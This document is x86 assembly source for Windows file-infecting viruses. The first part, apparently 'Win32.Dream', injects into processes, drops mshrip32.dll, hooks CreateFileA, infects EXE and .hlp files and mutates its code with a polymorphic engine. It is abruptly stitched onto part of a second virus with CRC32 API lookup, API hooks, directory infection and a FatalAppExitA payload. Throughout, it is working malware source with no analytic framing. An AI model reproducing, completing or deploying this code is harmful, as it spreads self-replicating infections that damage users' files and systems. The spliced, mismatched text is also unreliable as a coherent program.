mov edx,eax
stosd
movzx esi,word ptr [ebp+process_maps+ebx*2-vstart]
neg si
add esi,ebp
movzx ecx,word ptr [esi-2]
mov eax,4096
call malloc
xchg eax,edi
rep movsb ;copy one to mem
pop esi
push esi
movzx eax,byte ptr [ebp+m_sign-2-vstart]
mov [esi+4],eax ;thread memory sign
mov [esi],ecx ;active flag
push esi count-2
lea edi,[esi+apiz]
lea esi,[ebp+k32_addrs-vstart]
pop ecx
@@2:sub eax,eax
lodsw
neg ax
mov eax,[ebp+eax]
stosd
loop @@2
pop esi
push edx ecx 1F0FFFh
mov eax,0
lpRegisterServiceProcess equ $-4
or eax,eax
jz cpm_winnt
push 1 edx
call eax
cpm_winnt:
mov eax,0
lpOpenProcess equ $-4 ;create inside thread from
call eax ;the dropper
xchg eax,ecx
jecxz cpm_failed
mov edx,0
lpWaitForSingleObject equ $-4
call edx, ecx, 40
lodsd
not eax
xchg eax,ecx
jecxz cpm_failed
inc ebx
cmp bl,p_number
jnz cpm_nxproc
mov al,bh ;remove the virus from the
mov ecx,(mem_end - newCreateFile) ;current file, live on the
lea edi,[ebp+newCreateFile-vstart] ;other places inside win32
rep stosb
mov byte ptr [ebp+error-vstart],cl
cpm_failed:
pop eax
or ebx,ebx
jnz cpm_fnodeal
call mdealloc
cpm_fnodeal:
mov eax,[ebp+cpm_cmdline-vstart]
mdealloc:
push eax ;deallocate shared memory
mov eax,0
lpUnMapViewOfFile equ $-4
call eax
ret
error db 0
create_process_maps endp
build_dropper proc
mov eax,260 ;generate dropper filename
call malloc
mov [ebp+cpm_cmdline-vstart],eax
mov edi,eax
push 7Fh eax ;no more then 0x80 chars
mov eax,0
lpGetSystemDirectory equ $-4
call eax ;get system directory
or eax,eax
jz bd_failed
call bd_fname
db '\mshrip32.dll',0 ;hmmm, my dropper name
bd_fname:
pop esi
push 14
mov ebx,edi
add edi,eax
pop ecx
rep movsb
call open_always_file ;create its
jz bd_failed
dec eax
push eax
mov esi,1024 ;alloc memory for dropper
call malloc
xchg eax,edi ;edi=output, all is zero
mov eax,60000
push edi
lea esi,[ebp+dropper_data-vstart]
call malloc
xchg ebx,eax
mov [ebp+cpm_shared_mem-vstart],ebx
mov eax,0
lpGetVersion equ $-4
call eax
xor ecx,ecx
bt eax,63
adc edi,ecx
mov [ebx+paramz+(7-1)*4],edi
pop edi
push edi
mov al,[ebp+m_sign-2-vstart]
mov [esi+224],al ;noone knows what is it
bd_read: ;create EXE PE dropper
xor eax,eax
lodsb
cmp al,-1 ;end of data?
jz bd_done
add edi,eax ;next movement
lodsb
xchg eax,ecx
bd_write:
lodsb
stosb ;save data
loop bd_write
jmp bd_read
E8 equ 0E8
bd_done:
push 0
call @@2
dd ?
@@2:push 1024
push dword ptr [esp+12] ;droppers body
push dword ptr [esp+20] ;file handle
mov eax,0
lpWriteFile equ $-4
call eax
push eax dword ptr [esp+8]
call [ebp+lpCloseHandle-vstart]
pop ecx eax eax ;write error ?
jecxz bd_failed
test al,0F9h
bd_failed equ $-1
ret
build_dropper endp
malloc proc
pusha ;allocate shared memory
xchg ebx,eax
sub esi,esi
inc byte ptr [ebp+m_sign-2-vstart]
call m_sign
db "@",0
m_sign:
push ebx esi 4 esi 0-1
mov eax,0
lpCreateFileMappingA equ $-4
call eax
dec eax
jz m_failed
inc eax
push ebx esi esi 2 eax
mov eax,0
lpMapViewOfFile equ $-4
call eax
m_failed:
mov [esp+28],eax
popa
or eax,eax
ret
malloc endp
hookapi proc
mov ebx,0
ha_module equ $-4
cmp word ptr [ebx],'ZM'
jnz ha_failed
movzx esi,word ptr [ebx+60]
add esi,ebx
cmp word ptr [esi],'EP'
jnz ha_failed
mov eax,[esi+80h]
add eax,ebx
fk32:mov esi,eax
mov esi,[esi+12]
cmp [esi+ebx],'NREK'
jz fkok
sub eax,-20
jmp fk32
fkok:mov edx,[eax+16]
add edx,ebx
cmp dword ptr [eax],0
jz ha_failed
push edx
mov esi,[eax]
add esi,ebx
mov edx,esi
sub eax,eax
fklp:cmp dword ptr [edx],0
jz ha_failed2
cmp dword ptr [edx+3],80h
jz finc
mov esi,[edx]
lea esi,[esi+ebx+2]
call fnam
db "CreateFileA",0
fnam:pop edi
fcom:push 12
pop ecx
repe cmpsb
jecxz fapi
finc:inc eax
sub edx,-4
jmp fklp
fapi:shl eax,2
add eax,[esp]
xchg ebx,eax
mov eax,[ebx]
mov ecx,[ebp+cpm_shared_mem-vstart]
mov [ecx+vbody+newCreateFile+1-vstart],eax
lea eax,[ecx+vbody+newCreateFile-vstart]
mov [ebx],eax
pop ecx
ret
ha_failed2:
pop eax
ha_failed:
pop eax
jmp __return
hookapi endp
newCreateFile proc
push 80h
oldCreateFile equ $-4
pusha
call $+5
pop ebp
sub ebp,$-vstart-1
mov ebx,[ebp+cpm_shared_mem-vstart]
lea edi,[ebx+vbody+vsize]
mov word ptr [edi-vsize+__return+11-vstart],9090h
mov esi,[esp+7*4+12]
ncfc:lodsb
stosb
or al,al
jnz ncfc
lea edi,[ebx+active]
lea esi,[ebx+process] ;infect_file hProcess, ProcID
lodsd
xchg ebx,eax
lodsd
mov byte ptr [edi],1 ;active thread
push eax 0 1F0FFFh
call [ebp+lpOpenProcess-vstart]
xchg eax,ecx
jecxz ncf_failed
ncfw:push 40 ebx
call [ebp+lpWaitForSingleObject-vstart]
cmp byte ptr [edi],0
jnz ncfw
ncf_failed:
popa
ret
newCreateFile endp
st_count = 0
dw check_infected-infect_file
infect_file proc
start_thread infect_file
lea esi,[ebx+vbody+vsize]
ifex:lodsb
cmp al,'.'
jnz ifex
dec esi
lodsd
or eax,20202020h
mov ebx,[esp+44]
lea edi,[ebx+active+4]
lea esi,[ebx+process+8*4] ;infect_exe hProcess, ProcID
cmp eax,'exe.'
jz if_2
cmp eax,'plh.'
jnz if_failed
if_call_hlp:
sub esi,8 ;infect_hlp
dec edi
if_2:lodsd
push eax
lodsd
mov byte ptr [edi],1 ;active infect_exe (_hlp)
push eax 0 1F0FFFh
call [ebx+apiz+4*12] ;OpenProcess
xchg eax,ecx
jecxz if_failed - 1
if_r:pop eax
push eax 40 eax
call [ebx+apiz+4*13] ;WaitForSingleObject
cmp byte ptr [edi],0
jnz if_r
pop eax
if_failed:
end_thread infect_file
infect_file endp
dw create_infected-check_infected
check_infected proc
start_thread check_infected
xchg ebx,esi
xor esi,esi
cmp [ebx+paramz+(5-1)*4],1
jz ci_nomem
other_process_mem ebx, 4
ci_nomem:
add esi,[ebx+paramz+(4-1)*4]
mov ecx,[esi-4-tbyte] ;number of the terms in a
or ecx,ecx ;equation
jz ci_failed
cmp ecx,8
jnbe ci_failed
sub esp,128
fsave [esp]
push ecx
imul ecx,-(tbyte+tbyte)
sub ecx,tbyte+tbyte+4+tbyte
lea esi,[esi+ecx] ;data starts here
lea edi,[ebx+vbody+vsize+260]
cmp [ebx+paramz+(5-1)*4],1
jnz $ + 8
lea edi,[ebx+vbody+vsize+260+ci_size/2]
neg ecx
push edi
rep movsb
pop esi ecx
push ecx esi
fld tbyte ptr [esi+tbyte] ;derivation of the equations
fld st(0) ;you'll get two tangents
fld tbyte ptr [esi]
fmul
fld1
fsubp st(2),st
fstp tbyte ptr [esi]
fstp tbyte ptr [esi+tbyte]
sub esi,-(tbyte+tbyte)
loop $ - 21
pop esi ecx
sub esp,tbyte+tbyte
fldz
fldz
fstp tbyte ptr [esp]
fstp tbyte ptr [esp+tbyte]
push esi ecx
imul eax,[esp],tbyte+tbyte ;involution of the equations
fld tbyte ptr [esi]
fld tbyte ptr [esi+tbyte]
fld tbyte ptr [esi+eax+tbyte]
fld tbyte ptr [esi+eax]
fld st(2)
fld st(4)
fxch st(2)
lea edx,[ebp+($+32)-check_infected]
push edx
fyl2x ;over natural logarithm
fld st(0)
frndint
fsubr st(1),st
fxch
fchs
f2xm1
fld1
faddp
fscale
fstp st(1)
fmul
ret
fld tbyte ptr [esp+tbyte+2*dword]
faddp
fstp tbyte ptr [esp+tbyte+2*dword]
call $ - 35 ;we've two points on the curve
fld tbyte ptr [esp+2*dword]
faddp
fstp tbyte ptr [esp+2*dword]
sub esi,-(tbyte+tbyte)
dec dword ptr [esp] ;next term in the equation
jnz $ - 85
pop ecx ecx
fld tbyte ptr [esp+tbyte] ;calculate an angle of the
fld tbyte ptr [esp] ;two tangents of the equation
fld st(1)
fld st(1)
fsub
fxch st(2)
fmul
fld1
fadd
fdiv
fabs
fld1
fpatan
push 180 ;radian -> angle
fimul dword ptr [esp]
fldpi
fdiv
pop eax
sub esp,-(tbyte+tbyte)
mov eax,2*tbyte+dword
cmp dword ptr [ebx+paramz+(5-1)*4],1
jnz $ + 12
sub eax,-(dword-ci_size/2)
fld st(0)
fstp tbyte ptr [esi+eax]
fld tbyte ptr [esi+eax]
fsub
sub esp,tbyte
fstp tbyte ptr [esp]
cmp dword ptr [esp+tbyte-dword],0 ;compare the results
lahf
sub esp,-tbyte
wait
fnrstor [esp]
sub esp,-128
sahf
jnz ci_failed
push 1
pop eax
mov [ebx+paramz+(4-1)*4],eax
jmp ci_finish
ci_failed:
xor eax,eax
mov [ebx+paramz+(4-1)*4],eax
ci_finish:
cmp [ebx+paramz+(5-1)*4],1
jz $ + 8
call [ebx+apiz+8*4] ;UnMapViewOfFile
call [ebx+apiz+1*4] ;CloseHandle
end_thread check_infected
check_infected endp
dw infect_hlp-create_infected
create_infected proc
start_thread create_infected
lea edi,[esi+vbody+vsize+260]
push edi
stosd
call $ + 241 ;number of the terms in a
shr eax,29 ;equation
xchg eax,ecx
inc ecx
push ecx
sub esp,128
fnsave [esp]
call $ + 221 ;generate a multiplier (+/-)
sub edx,edx
mov ebx,100000
div ebx
or edx,edx
jz $ - 16
fld1
rcr eax,1
jc $ + 4
fchs
push edx
fimul dword ptr [esp]
fstp tbyte ptr [edi]
pop edx
sub edi,-tbyte
call $ + 119 ;generate an exponent
loop $ - 41 ;next term in the equation
inc ecx
inc ecx
call $ + 110 ;two points on the curve
loop $ - 5
fnrstor [esp]
sub esp,-128
pop eax
stosd
lea ecx,[edi+tbyte]
sub edi,[esp]
xchg eax,edi
pop edi
stosd
pusha ;calculate an angle, it
mov ebx,esi ;means: call other process
mov [esi+paramz+(4-1)*4],ecx
mov [esi+paramz+(5-1)*4],1
lea edi,[esi+active+1]
lea esi,[esi+process+1*8]
lodsd
push eax
lodsd
mov byte ptr [edi],1
push eax 0 1F0FFFh
call [ebx+apiz+4*12] ;OpenProcess
pop esi
push 40 esi
call [ebx+apiz+4*13] ;WaitForSingleObject
cmp byte ptr [edi],0
jnz $ - 9
popa
mov [esi+paramz+(5-1)*4],0
end_thread create_infected
call $ + 66 ;generate an exponent
sub edx,edx
push 11
pop ebx
div ebx
or edx,edx
jz $-14
push edx
fild dword ptr [esp]
call $+15
dt 3FEB8637BD05AF6C69B6r
pop eax ebx
fld tbyte ptr [eax]
xchg ebx,eax
cdq
call $ + 25
mov ebx,1000000
div ebx
push edx
fimul dword ptr [esp]
fsub
fstp tbyte ptr [edi]
pop eax
sub edi,-tbyte
ret
mov eax,0 ;get a random value
lpGetTickCount equ $-4
call eax
add eax,80h
push ecx 33
pop ecx
add eax,eax
jnc $ + 4
xor al,197
loop $ - 6
mov [ebp+($-16)-create_infected],eax
pop ecx
ret
create_infected endp
dw infect_exe-infect_hlp
infect_hlp proc
start_thread infect_hlp
sub esp,16
sub ebx,ebx
mov word ptr [esi+vbody+__return+11-vstart],02EBh
lea eax,[esi+vbody+vsize]
push ebx 80h 3 ebx ebx 0c0000000h eax
call [esi+apiz+4*0] ;open file
inc eax
jz ih_failed
dec eax
push eax
mov bh,80h
push ebx 40h
mov eax,0
lpGlobalAlloc equ $-4
call eax ;GlobalAlloc
mov [esp+4],eax
xchg eax,esi
push 16
pop ecx
sub edx,edx
call read
jc ih_free
lodsd
cmp eax,35f3fh ;hlp signature
jnz ih_free
lodsd
lea edx,[eax+55] ;directory offset
mov ecx,512
lodsd
lodsd
call read
ih_search:
dec ecx
jz ih_free
cmp dword ptr [esi+ecx],'SYS|'
jnz ih_search
cmp dword ptr [esi+ecx+4],'MET'
jnz ih_search
mov eax,[esi-4]
xchg eax,[esi+ecx+8]
xchg eax,edx
push 21
sub esi,-512
pop ecx
call read
lodsd
push 21
pop ecx
sub eax,ecx
add edx,ecx
mov [esp+4+4],edx
mov [esp+8+4],eax
mov edi,[esp+4]
sub edi,-549
lea esi,[ebp+hlp1_s-infect_hlp]
lea eax,[edi+size-hlp1_s]
mov [esp+12+4],eax
push hlp1_e-hlp1_s
pop ecx
rep movsb
push edi
mov ebx,[esp+40+16+8+4]
lea esi,[ebx+vbody]
push esi
sub esi,-vsize
ih_next:
sub esi,4
mov eax,[esi]
call ihck
or edx,edx
jnz ihex
mov al,68h
stosb
mov eax,[esi]
stosd
jmp ihdn
ihex:mov al,0b8h
stosb
mov eax,[esi]
xor eax,edx
stosd
mov al,53
stosb
mov eax,edx
stosd
mov al,80
stosb
ihdn:cmp [esp],esi
jnz ih_next
jmp ihcn
ihck:call ihcv
jc iha1
sub edx,edx
ret
iha1:mov ebx,eax
ihax:mov eax,ebx
call $+9
dd 12345678h
pop edx
sub [edx],12345678h
org $-4
rnd dd 87654321h
mov edx,[edx]
xor [ebp+rnd-infect_hlp],edx
xor eax,edx
call ihcv
jc ihax
xchg eax,edx
call ihcv
jc ihax
xchg edx,eax
ret
ihcv:pusha
push 4
pop ecx
icva:cmp al,' '
jna icvf
cmp al,0f0h
jnbe icvf
cmp al,'"'
jz icvf
cmp al,"'"
jz icvf
cmp al,"`"
jz icvf
cmp al,"\"
jz icvf
ror eax,8
loop icva
test al,0F9h
icvf equ $-1
popa
ret
ihcn:pop eax eax
mov ecx,edi
sub ecx,eax
sub eax,eax
mov [esi+org_ep-vstart],eax
push ecx
sub ecx, p1-hlp1_e+hlp1_e-hlp2_e
mov eax,[esp+12+4+4]
mov [eax],cx
sub esi,vstart-hlp1_e
push hlp2_sz
pop ecx
rep movsb
pop eax
mov esi,[esp+4] ;buffer
sub esi,-528
sub eax,hlp1_s-hlp2_e-21
mov [esi],eax
add [esi+4],eax
mov esi,edi
mov edx,[esp+4+4]
mov ecx,[esp+8+4]
sub eax,ecx
jna ih_free
call read
cmp [esi+4],"`(RR" ;already infected?
jz ih_free
mov ebx,[esp+4]
lea ecx,[edi+eax]
sub ecx,ebx
sub ecx,528
mov eax,[esp+4]
sub eax,-528
mov edx,[eax]
sub edx,ecx
sub [eax],edx
mov edx,[ebx+12]
lea esi,[ebx+528]
call write
mov esi,[esp+4]
push 16
add [esi+12],ecx
sub edx,edx
pop ecx
call write
mov edx,[esi+4]
sub edx,-55
mov ecx,512
sub esi,-16
call write
jmp ih_free
spos:pusha
sub eax,eax
push eax eax edx dword ptr [esp+4*5+8*4]
mov eax,0
lpSetFilePointer equ $-4
call eax
popa
ret
read:call spos
pusha
sub eax,eax
push ecx eax
call $+9
r_ts:dd ?
push ecx esi dword ptr [esp+4*6+8*4]
mov eax,0
lpReadFile equ $-4
call eax
pop ecx
cmp dword ptr [ebp+r_ts-infect_hlp],ecx
jnz $+3
test al,0F9h
popa
ret
write:call spos
pusha
sub eax,eax
push eax
lea ebx,[ebp+r_ts-infect_hlp]
push ebx ecx esi dword ptr [esp+4*5+8*4]
mov eax,[esp+4*5+8*4+4+16+8+40] ;ou! what does it mean :) ?
call [eax+apiz+4*10]
popa
ret
hlp1_s=$
dw 4
dw offset label1-$-2
db "RR(`USER32.DLL',`EnumWindows',`SU')",0
label1=$
dw 4
size dw 0
p1 = $
db "EnumWindows(`"
hlp1_e= $
jmp esp
db "',0)",0
hlp2_e = $
hlp2_sz=hlp2_e-hlp1_e
ih_free:
mov esi,[esp+40+16+4+4]
call [esi+apiz+4*1] ;CloseHandle
mov eax,0
lpGlobalFree equ $-4
call eax
ih_failed:
sub esp,-12
end_thread infect_hlp
infect_hlp endp
dw poly_engine-infect_exe
infect_exe proc
start_thread infect_exe
sub ebx,ebx
lea eax,[esi+vbody+vsize]
push ebx 80h 3 ebx ebx 0c0000000h eax
call [esi+apiz+4*0] ;CreateFileA
inc eax
jz ie_failed
dec eax
push eax ebx eax
mov eax,0
lpGetFileSize equ $-4
call eax
cmp eax,4096
jc ie_close
cmp eax,104857600
jnbe ie_close
mov [ebp+fsize-infect_exe],eax
call $ + 7
db "1",0
push ebx ebx 2 ebx dword ptr [esp+4*5]
call [esi+apiz+4*6] ;CreateFileMappingA
or eax,eax
jz ie_close
push eax ebx ebx ebx 4 eax
call [esi+apiz+28] ;MapViewOfFile
or eax,eax
jz ie_mclose
push eax
cmp word ptr [eax],'ZM'
jnz ie_unmap
cmp word ptr [eax+MZ_crlc],bx
jz ie_tested
cmp word ptr [eax+MZ_lfarlc],64
jc ie_unmap
ie_tested:
mov edi,[eax+MZ_lfanew]
add edi,eax
cmp dword ptr [edi],4550h
jnz ie_unmap
mov eax,[esp+4]
mov [esi+paramz+(3-1)*4],eax
mov eax,[ebp+fsize-infect_exe]
mov [esi+paramz+(4-1)*4],eax
cmp [esi+paramz+(4-1)*4],1
jz ie_unmap
mov ax,[edi+NT_FileHeader.FH_Characteristics]
test ax,IMAGE_FILE_EXECUTABLE_IMAGE
jz ie_unmap
test ax,IMAGE_FILE_DLL
jnz ie_unmap
movzx ecx,[edi+NT_FileHeader.FH_NumberOfSections]
dec ecx
or ecx,ecx
jz ie_unmap
imul eax,ecx,IMAGE_SIZEOF_SECTION_HEADER
movzx edx,[edi+NT_FileHeader.FH_SizeOfOptionalHeader]
mov [ebp+ie_section-infect_exe],eax
lea ebx,[edx+edi+NT_OptionalHeader.OH_Magic]
add ebx,eax
mov eax,[ebx+SH_SizeOfRawData]
push eax
add eax,[ebx+SH_VirtualAddress]
lea ecx,[esi+vbody+inf_ep-vstart]
mov [ecx],eax
mov eax,[edi+NT_OptionalHeader.OH_AddressOfEntryPoint]
mov [ecx+5+6],eax
pop eax
add eax,[ebx+SH_PointerToRawData]
add eax,[esi+paramz+4*0]
add eax,dword ptr [esi+vbody+vsize+260]
mov ecx,[edi+NT_OptionalHeader.OH_FileAlignment]
add eax,ecx
cdq
dec eax
div ecx
mul ecx
mov [ebp+align_d-infect_exe],eax
call [esi+apiz+4*8] ;UnMapViewOfFile
call [esi+apiz+4*1] ;CloseHandle
sub ebx,ebx
call $ + 7
db "1",0
align_d equ $+1
push 80h ebx 4 ebx dword ptr [esp+4*5]
call [esi+apiz+4*6] ;CreateFileMappingA
push eax ebx ebx ebx 2 eax
call [esi+apiz+4*7] ;thx2 Bumblebee for his help
push eax
add eax,[eax.MZ_lfanew]
xchg eax,edi
mov ebx,0
ie_section equ $-4
movzx edx,[edi+NT_FileHeader.FH_SizeOfOptionalHeader]
lea eax,[edx+edi+NT_OptionalHeader.OH_Magic]
movzx ecx,[edi+NT_FileHeader.FH_NumberOfSections]
add eax,ebx
ie_change_flag:
or [eax.SH_Characteristics],IMAGE_SCN_MEM_WRITE
sub eax,IMAGE_SIZEOF_SECTION_HEADER
loop ie_change_flag
lea eax,[edx+edi+NT_OptionalHeader.OH_Magic]
add ebx,eax
mov eax,[esi+vbody+inf_ep-vstart]
mov [edi+NT_OptionalHeader.OH_AddressOfEntryPoint],eax
pusha
mov ecx,[esi+paramz+4*0]
mov [esp+7*4],ecx
mov edi,[ebx+SH_SizeOfRawData]
add [esp+7*4],edi
add edi,[ebx+SH_PointerToRawData]
add edi,[esp+7*4+4]
lea esi,[esi+vbody+vsize+260+ci_size] ;poly vbody
rep movsb
popa
mov eax,[esi+paramz+4*0]
add eax,[ebx+SH_SizeOfRawData]
mov ecx,[edi+NT_OptionalHeader.OH_FileAlignment]
add eax,ecx
cdq
dec eax
div ecx
mul ecx
mov [ebx+SH_SizeOfRawData],eax
push eax
mov eax,[ebx+SH_VirtualSize]
add eax,vsize+68
mov ecx,[edi+NT_OptionalHeader.OH_SectionAlignment]
add eax,ecx
cdq
dec eax
div ecx
mul ecx
pop ecx
cmp eax,ecx
jnc ie_1
mov eax,ecx
ie_1:mov [ebx+SH_VirtualSize],eax
add eax,[ebx+SH_VirtualAddress]
cmp eax,[edi+NT_OptionalHeader.OH_SizeOfImage]
jc ie_2
mov [edi+NT_OptionalHeader.OH_SizeOfImage],eax
ie_2:or dword ptr [ebx+SH_Characteristics], \
IMAGE_SCN_CNT_CODE or IMAGE_SCN_MEM_EXECUTE or \
IMAGE_SCN_MEM_WRITE
.if dword ptr [edi+NT_OptionalHeader.OH_CheckSum] != 0
mov eax,0
fsize equ $-4
add eax,[esi+paramz+(1-1)*4]
mov [esi+paramz+(2-1)*4],eax
mov eax,[esi+paramz+(4-1)*4]
mov [edi+NT_OptionalHeader.OH_CheckSum],eax
.endif
push esi
mov edi,[ebp+align_d-infect_exe]
add edi,[esp+4]
lea esi,[esi+vbody+vsize+260]
lodsd
sub eax,4-tbyte
sub edi,eax
xchg eax,ecx
rep movsb
pop esi
ie_unmap:
call [esi+apiz+4*8] ;UnMapViewOfFile
ie_mclose:
call [esi+apiz+4*1] ;CloseHandle
ie_close:
call [esi+apiz+4*1] ;CloseHandle
ie_failed:
end_thread infect_exe
other_process proc
pusha
mov ecx,[esp+36]
mov ebx,esi
lea edi,[esi+active+ecx]
lea esi,[esi+process+ecx*8]
lodsd
push eax
lodsd
mov byte ptr [edi],1
push eax 0 1F0FFFh
call [ebx+apiz+4*12] ;OpenProcess
pop esi
push 40 esi
call [ebx+apiz+4*13] ;WaitForSingleObject
cmp byte ptr [edi],0
jnz $ - 9
popa
ret 4
other_process endp
infect_exe endp
dw checksum-poly_engine
poly_engine proc
start_thread poly_engine
mov ebx,esi
lea esi,[ebx+vbody+vsize]
lea edi,[esi+260+ci_size]
push ebx edi
sub ecx,ecx
mov edx,vsize / 2
mov eax,0E8h
stosd
mov eax,242C8300h
stosd
mov al,5
stosb
@@a:call random
test al,1
jnz @@b
cmp edx,1
jz @@v
sub esi,4
push esi
lodsd
call @@1_a
pop esi
dec edx
jmp @@k
@@b:test al,2
jnz @@c
@@v:dec esi
dec esi
push esi
lodsw
inc ecx
call @@1_a
pop esi
sub cl,cl
jmp @@k
@@c:test al,4
jnz @@e
call @@1 ;push random value DWORD
jc $+7
call @@2
jmp @@l
@@e:inc ecx ;push random value WORD
call @@1
jc $+7
call @@2
sub cl,cl
jmp $+5
@@k:dec edx
jz $+4
@@l:jmp @@a
mov ax,0E4FFh
stosw
jmp pe_failed
@@1:call random ;push random value
test al,1
jnz @@1_d
@@1_a:xchg eax,ebx ;push certain value
@@1_b:jecxz @@1_c ;push WORD
mov al,66h
stosb
@@1_c:call @@3_a
test al,0F9h
@@1_d equ $-1
ret
@@2:call random ;POP reg32 or ADD ESP,4
test al,1
jnz @@2_b
and al,7
cmp al,4
jz @@2
or al,al
jz @@2
jecxz @@2_a
xchg eax,ebx
mov al,66h
stosb
xchg ebx,eax
@@2_a:add al,58h
stosb
ret
@@2_b:mov ax,0C483h
stosw
mov al,4
jecxz @@2_c
mov al,2
@@2_c:stosb
ret
@@3:xchg eax,ebx ;push certain value in EAX
@@3_a:mov al,68h ; in EBX
stosb
xchg eax,ebx
jecxz @@3_b
stosw
ret
@@3_b:stosd
ret
random:
mov eax,0BFF71234h
push ecx 33
pop ecx
@@r:add eax,eax
jnc $+4
xor al,197
loop @@r
mov [ebp+random+1-poly_engine],eax
pop ecx
ret
pe_failed:
pop ecx ebx
sub edi,ecx
mov [ebx+paramz+4*0],edi
end_thread poly_engine
poly_engine endp
dw k32_addrs-checksum
checksum proc
start_thread checksum
xchg ebx,esi
mov ecx,[ebx+paramz+(2-1)*4]
sub edx,edx
shr ecx,1
@@1:lodsw
mov edi,0FFFFh
and eax,edi
add edx,eax
mov eax,edx
and edx,edi
shr eax,10h
add edx,eax
loop @@1
mov eax,edx
shr eax,10h
add ax,dx
add eax,[ebp+4]
mov [ebx+paramz+(4-1)*4],eax
call [ebx+apiz+8*4] ;UnMapViewOfFile
call [ebx+apiz+1*4] ;CloseHandle
end_thread checksum
checksum endp
process_memory struc
thandle dd 0 ;returned thread handle by dropper
th_mempos dd 0 ;thread body memory position
process dd p_number dup (0,0) ;hProcess (Wait), ProcessID (Open)
apiz dd count-2 dup (0) ;all API functionz without two last
active db p_number dup (0) ;active process (=function) ?
paramz dd 8 dup (0) ;process parameters
vbody db vsize dup (0) ;virus body (poly, valuez)
; filename dd 260 dup (0) ;name of file (opening, etc)
ci_size equ 2*16*(tbyte+tbyte) ;check_infected fpu buffer
; cinfected db ci_size dup(0)
; poly_vbody equ this byte
; ** This is Tasm32 bug, cannot asm through const->proc + dup
ends
align 4
file_end:
db 68 dup(0)
mem_end:
push 401000h
sub esp,vsize
jmp vstart
fgx:db "E:\X_WIN\ABCD.EXE",0
fg0:mov edx,offset fgx
sub eax,eax
push eax 80h 3 eax eax 0c0000000h edx
call CreateFileA
push 0 0
call fg1
db "Win32.Dream - welcome to my world...",0
fg1:call fg2
db "First generation sample",0
fg2:push 0
call MessageBoxA
call ExitProcess
.DATA
; dummy data
db 'WARNING - This is a virus carrier - WARNING'
.CODE
vBegin label byte
inicio:
; call for the polymorphic decryptor
call crypt
; setup relocations
pop eax ; get stored virus EP
lea edx,inicio+ebp ; get current
sub edx,eax ; calc displacement
add dword ptr [esp+20h],edx ; fix hostRET
add dword ptr [imageBase+ebp],edx ; fix image base
getK32notEPO:
; use the value in the stack
mov esi,dword ptr [esp+24h]
call GetKernel32
jc tryFix
getAPIsNow:
; now get APIs using CRC32
mov edi,12345678h
kernel32 equ $-4
mov esi,edi
mov esi,dword ptr [esi+3ch]
add esi,edi
mov esi,dword ptr [esi+78h]
add esi,edi
add esi,1ch
lodsd
add eax,edi
mov dword ptr [address+ebp],eax
lodsd
add eax,edi
mov dword ptr [names+ebp],eax
lodsd
add eax,edi
mov dword ptr [ordinals+ebp],eax
sub esi,16
lodsd
mov dword ptr [nexports+ebp],eax
xor edx,edx
mov dword ptr [expcount+ebp],edx
lea eax,FSTAPI+ebp
searchl:
mov esi,dword ptr [names+ebp]
add esi,edx
mov esi,dword ptr [esi]
add esi,edi
push eax edx edi
xor edi,edi
movzx di,byte ptr [eax+4]
call CRC32
xchg ebx,eax
pop edi edx eax
cmp ebx,dword ptr [eax]
je fFound
add edx,4
inc dword ptr [expcount+ebp]
push edx
mov edx,dword ptr [expcount+ebp]
cmp dword ptr [nexports+ebp],edx
pop edx
je returnHost
jmp searchl
fFound:
shr edx,1
add edx,dword ptr [ordinals+ebp]
xor ebx,ebx
mov bx,word ptr [edx]
shl ebx,2
add ebx,dword ptr [address+ebp]
mov ecx,dword ptr [ebx]
add ecx,edi
lea esi,inicio+ebp
mov edi,eax
mov ecx,vSize
rep movsb
lea esi,hostRET-1
lea edi,inicio+ebp
mov ecx,5
rep movsb
mov byte ptr [edi],0c3h
add eax,offset memCopy-offset inicio
push eax
ret
memCopy:
; get delta offset another time
call getDelta
lea edx,fileSize+ebp
cmp word ptr [edx+2],4
jne skipPay
cmp word ptr [edx+6],6
jne skipPay
lea edx,message+ebp
push edx
xor eax,eax
push eax
call dword ptr [_FatalAppExitA+ebp] ; bye bye ;)
skipPay:
; alloc a temporary buffer to generate the poly sample
; of the virus ready to infect
push 00000004h
push 00001000h OR 00002000h
push (vSize+1000h)
push 0h
call dword ptr [_VirtualAlloc+ebp]
or eax,eax
jz returnHost
returnHost:
popad
ret
;
; Returns Delta offset into ebp.
;
getDelta:
call delta
delta:
pop ebp
sub ebp,offset delta
ret
;
; General hook. This routine is for all the hooks.
; We have into esi the path to analize, the address of the
; original API in the stack (plus a pushad) and the delta
; offset into ebp. I use a semaphore 'cause the virus doesn't support
; multithread. In case hooked API is called by other thread while
; the virus is in the infection process could be fatal. I'm not sure
; 100% this is necessary but... ;)
;
generalHook:
pushfd
cld
; set sem to working
mov byte ptr [semHook+ebp],1
call stringUp
jc hookInfectionFail
push edi
lea edx,stringBuffer+ebp
push edx
call dword ptr [_GetFileAttributesA+ebp]
pop edi
inc eax
jz hookInfectionFail
dec eax
lea edx,stringBuffer+ebp
cmp word ptr [edx+1],'\:' ; absolute path?
je getPath
pathOk:
mov dword ptr [edi],0 ; now we have a path
call infectDir
jmp hookInfectionFail
hookInfectionFail:
; set sem to free
mov byte ptr [semHook+ebp],0
popfd
popad
ret
;
; Nice macro ;)
;
@hook macro ApiAddress
push eax
pushad
call getDelta
mov eax,dword ptr [ApiAddress+ebp]
mov dword ptr [esp+20h],eax
mov esi,dword ptr [esp+28h]
GetKernel32Loop:
dec esi
cmp word ptr [esi],'ZM' ; 'poda' -> this makes algo
jne GetKernel32Loop ; faster
mov dx,word ptr [esi+3ch]
test dx,0f800h
jnz GetKernel32Loop
cmp esi,dword ptr [esi+edx+34h]
jne GetKernel32Loop
mov dword ptr [kernel32+ebp],esi
xor edi,edi
pop dword ptr fs:[edi]
pop eax
popad
clc
ret
GetKernel32Exception:
xor edi,edi
mov eax,dword ptr fs:[edi]
mov esp,dword ptr [eax]
xor edi,edi
pop dword ptr fs:[edi]
pop eax
popad
stc
ret
;
; This routine makes CRC32.
;
CRC32:
cld
xor ecx,ecx
dec ecx
mov edx,ecx
push ebx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC:
dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jnz NextByteCRC
pop ebx
not edx
not ecx
mov eax,edx
rol eax,16
mov ax,cx
ret
;
; Updates the virus sample ready to infect in our memory buffer.
;
updateVSample:
lea esi,vBegin+ebp
mov edi,dword ptr [memHnd+ebp]
mov ecx,vSize
